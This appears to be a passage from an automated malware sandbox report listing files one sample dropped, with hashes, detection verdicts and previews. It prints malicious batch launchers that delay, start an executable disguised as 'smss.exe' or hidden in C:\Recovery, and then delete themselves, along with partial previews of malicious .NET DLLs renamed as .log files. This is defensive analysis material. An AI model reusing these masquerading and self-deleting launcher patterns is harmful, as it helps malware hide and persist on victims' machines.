SHA-512:	69F8A1313FF882441EEFD37DC5A49D2B73D73AB3643525B908DBA21B486A3996ECAB8ECCC7F5014E32B5D2BBC1A95FE61BAC5B0E2A7BEA9EFAC93E2D0C1E77BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\PdP1UB7pUq.bat"

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qyoxjbf.ksi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1z2d4wr4.enr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_204cgf3a.n1a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3huwwsql.mvg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41jrsf3x.bcl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5suoqzur.1lc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anz25kmu.ogu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5mtyo0q.je1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbcafq3x.vtx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gesfknzj.wnn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghhvgh2r.pnt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqdnchle.0x1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iponaj52.21s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy22w5qk.rze.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4ktkngq.g4p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsfpsf1t.3oy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltjcsplt.mo2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oj5ucnuc.nfl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwf2ywyw.3bw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_us3vk33h.fr0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usgrbl1c.22c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwoxd4dh.33n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0i5pbrp.smq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4h4s3op.sn0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\dv8cCFDVxH

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:CNchvB:CkB
MD5:	2964126A61C3C68B61C9D79A07F60952
SHA1:	5A362C0FE0C32B856D1D7B5100EA7E3A70CE165E
SHA-256:	E57342202AC85B71D54AAE7D9267ABAC47BF7681949877F1CD27C11F90C488A7
SHA-512:	03EE543C356F563DC5B7308805F7D17023F42D16E83D8953019F6B4A8C425E1B9C9FDD4795719D97B22A2B3F6B2463BE44A5F1E5DCB05EE88CEA3B8AE16043CD
Malicious:	false
Preview:	txc3oOB6ybnI76OrckpLdpLM9

C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	211
Entropy (8bit):	5.146059111986477
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEi4/ZmvKOZG1qLTwi23fvd:HTg9uYDEi4/cwZnd
MD5:	F07BCFB40F3F4C0FAF2621EDEB666094
SHA1:	00CE57A509AE07D6762E2830689AAC37E0668788
SHA-256:	853FF7FBC5ECE3307D232E5EEE5CBF16D6B8E1FE65B4C30B4BB2D54D8F17F834
SHA-512:	F35ECF0118638BBEA0AB454ABFC27BD520D0BF9BD65BA04B04CE1BBB1DB8903D77D0B4696DE73D20BDE13FD64D1178785806E82DF18C726C55C10DAE4C35BD68
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows NT\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fDDEz4CMJh.bat"

C:\Users\user\AppData\Local\Temp\jGtvbkA8vZ

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:C2CIB/p0pU:9kU
MD5:	9F3DCC4828AF3B4B444F40162348ADEA
SHA1:	CBC0CCDD069C95D303B4BDB4B7DE3281EC5E9E23
SHA-256:	6E90C9F188A879A660C59D0818F06D5F7E020D2A318CC8AB87023C292C9DB761
SHA-512:	4A5FCC563008FE37B42E3FC164CCB370388CE9EF8C2EEE898B0A7C1E9F115B46E9436BE2CF90D7F5C3B0236E83714B5E763FF5BA32E59E53017EBEC39F85D973
Malicious:	false
Preview:	nN9EFtkCdc0qtdasLdLork7n1

C:\Users\user\Desktop\BAOTDPUV.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: SearchIndexer.exe, Detection: malicious, Browse Filename: fatality.exe, Detection: malicious, Browse Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse Filename: 85D5ktqjpd.exe, Detection: malicious, Browse Filename: VIyu4dC9CU.exe, Detection: malicious, Browse Filename: top.exe, Detection: malicious, Browse Filename: DC86.exe, Detection: malicious, Browse Filename: WinPerfcommon.exe, Detection: malicious, Browse Filename: Udzp7lL5ns.exe, Detection: malicious, Browse Filename: loader.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BOAdhoQl.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BwtLSSWj.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DYilKdVO.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
